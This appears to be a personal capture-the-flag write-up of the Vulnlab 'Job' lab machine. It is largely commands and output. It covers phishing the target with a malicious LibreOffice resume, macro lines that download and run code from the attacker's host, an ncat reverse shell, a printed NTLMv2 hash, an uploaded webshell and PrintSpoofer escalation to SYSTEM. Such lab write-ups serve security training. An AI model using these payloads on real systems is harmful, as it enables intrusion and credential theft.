chidunguyen.com

JOB-VL Notes

JOB-VulnLab

Written by

Du

in

Here is my notes on JOB box from Vulnlab. 

JOB: 10.10.107.187

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-IIS/10.0
|_http-dombased-xss: Couldn't find any DOM based XSS.


We are looking for developers!


Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.

https://m.opnxng.com/@raphaeltzy13/introduction-to-client-side-attacks-oscp-62e9e254c0b7

https://github.com/0bfxgh0st/MMG-LO.git


./mmg-ods.py windows 1234 10.8.0.71


┌──(root㉿kali)-[/home/kali/Kali-Tools/MMG-LO]
└─# python3 mmg-ods.py windows 1234 10.8.0.71

[+] Payload: windows reverse shell
[+] Creating malicious .ods file

Done.

sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume' \
                       -a Resume.doc
					   
					   
sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume: http://10.8.0.71/Resume.doc' 
					   


sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume: Please enable editing.' \
                       -a Resume.odt
					   

					   
┌──(root㉿kali)-[/home/kali/VL/JOB/10.10.107.187]
└─# sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume: Please enable editing.' \
                       -a Resume.odt
Oct 29 15:17:21 kali sendemail[193912]: Email was sent successfully!
					   
					   
Reverse-shell will not work so we are going to use it to obtain hash instead. 

https://github.com/rmdavy/badodf

┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# python3 badodt.py

    ____            __      ____  ____  ______
   / __ )____ _____/ /     / __ \/ __ \/ ____/
  / __  / __ `/ __  /_____/ / / / / / / /_
 / /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/      \____/_____/_/


Create a malicious ODF document help leak NetNTLM Creds

By Richard Davy
@rd_pentest
Python3 version by @gustanini
www.secureyourit.co.uk


Please enter IP of listener: 10.8.0.71
/home/kali/Kali-Tools/badodf/bad.odt successfully created


┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# ls
bad.odt  badodt.py  README.md

┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# mv bad.odt Resume.odt

┌──(root㉿kali)-[/home/kali/Kali-Tools/badodf]
└─# sendemail -f 'jonas@lookjob.com' \
                       -t 'career@job.local' \
                       -s 10.10.107.187:25 \
                       -u 'My Resume' \
                       -m 'Here is your requested resume' \
                       -a 'Resume.odt'

Oct 29 14:23:33 kali sendemail[179134]: Email was sent successfully!

Hash Obtained with Responder -i tun0:

[SNIP] 

[SMB] NTLMv2-SSP Client   : 10.10.107.187
[SMB] NTLMv2-SSP Username : JOB\jack.black
[SMB] NTLMv2-SSP Hash     : jack.black::JOB:c186781b0844a1eb:743E74238005A260CFE6745FEC0F80E7:010100000000000000C2ABA50D2ADB01612807817C18C3AF00000000020008004800310033004C0001001E00570049004E002D005500440045005600350035004700330035004500540004003400570049004E002D00550044004500560035003500470033003500450054002E004800310033004C002E004C004F00430041004C00030014004800310033004C002E004C004F00430041004C00050014004800310033004C002E004C004F00430041004C000700080000C2ABA50D2ADB0106000400020000000800300030000000000000000000000000200000A3F02E29D698485E9A0BC8C9101264C628950B026635DDBC8D18EC5BE52FFE280A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0030002E00370031000000000000000000


jack.black::JOB:c186781b0844a1eb:743E74238005A260CFE6745FEC0F80E7:010100000000000000C2ABA50D2ADB01612807817C18C3AF00000000020008004800310033004C0001001E00570049004E002D005500440045005600350035004700330035004500540004003400570049004E002D00550044004500560035003500470033003500450054002E004800310033004C002E004C004F00430041004C00030014004800310033004C002E004C004F00430041004C00050014004800310033004C002E004C004F00430041004C000700080000C2ABA50D2ADB0106000400020000000800300030000000000000000000000000200000A3F02E29D698485E9A0BC8C9101264C628950B026635DDBC8D18EC5BE52FFE280A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0030002E00370031000000000000000000

#NOPE, cannot crack it. 


[SNIP]

#If that don't work then at least we know the odt file is the one we should exploit. 

Exploit odt works !

Resume.odt:

Sub Main

    Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://10.8.0.71/')""")
    
End Sub




Sub Main

    Shell("certutil.exe -urlcache -split -f 'http://10.8.0.71/ncat.exe' 'C:\Users\Public\ncat.exe'")
    
End Sub


Sub Main

    Shell("C:\Users\Public\ncat.exe -e cmd.exe 10.8.0.71 1234")
    
End Sub

#One command at a time, cannot run multiple commands at the same time.

https://dominicbreuker.com/post/htb_re/

https://0xdf.gitlab.io/2020/02/01/htb-re.html


sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.107.187] 54481
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
job\jack.black

C:\Program Files\LibreOffice\program>whoami
whoami
job\jack.black

C:\Program Files\LibreOffice\program>hostname
hostname
job


USER-SHELL ! 

C:\Users\jack.black\Desktop>whoami
whoami
job\jack.black

C:\Users\jack.black\Desktop>hostname
hostname
job

C:\Users\jack.black\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8032-DF86

 Directory of C:\Users\jack.black\Desktop

11/09/2021  09:43 PM    <DIR>          .
10/29/2024  05:07 PM    <DIR>          ..
11/09/2021  09:43 PM                36 user.txt
               1 File(s)             36 bytes
               2 Dir(s)  15,676,846,080 bytes free

C:\Users\jack.black\Desktop>type user.txt
type user.txt
VL{REDIRECTED}

USER.TXT: VL{REDIRECTED}


PRIV ESC: 

jack.black -> iis apppool\defaultapppool

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v  #NOPE. 

No query user. 

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #NOPE

No hidden ports either.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer #NOPE


WinPEAS: 

Hostname: job
    ProductName: Windows Server 2022 Datacenter
    EditionID: ServerDatacenter
    ReleaseId: 2009
    BuildBranch: fe_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
	
	

Looks like we can write files C:\inetpub\wwwroot folder (/var/www/html in Windows). 

Upload cmd.aspx to wwwroot.

http://10.10.107.187/cmd.aspx = iis apppool\defaultapppool user !

Use that webshell to gain a shell with netcat like we did last to gain a IIS defaultpool shell.

sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.107.187] 55869
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>hostname
hostname
job

iis apppool\defaultapppool SHELL !


iis apppool\defaultapppool -> SYSTEM: 

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool


c:\>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


POTATO !

C:\Users\Public>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
job

SYSTEM-SHELL !


C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>hostname
hostname
job

C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}

ROOT.TXT: VL{REDIRECTED}





445/tcp  open  microsoft-ds?

session setup failed: NT_STATUS_ACCESS_DENIED


3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows




Check if you can write and upload files to C:\inetpub\wwwroot folder so that you can gain a shell of iis apppool\defaultapppool user, Usually this user has SeImpersonatePrivilege enabled therefore Juicy-Potato !

More posts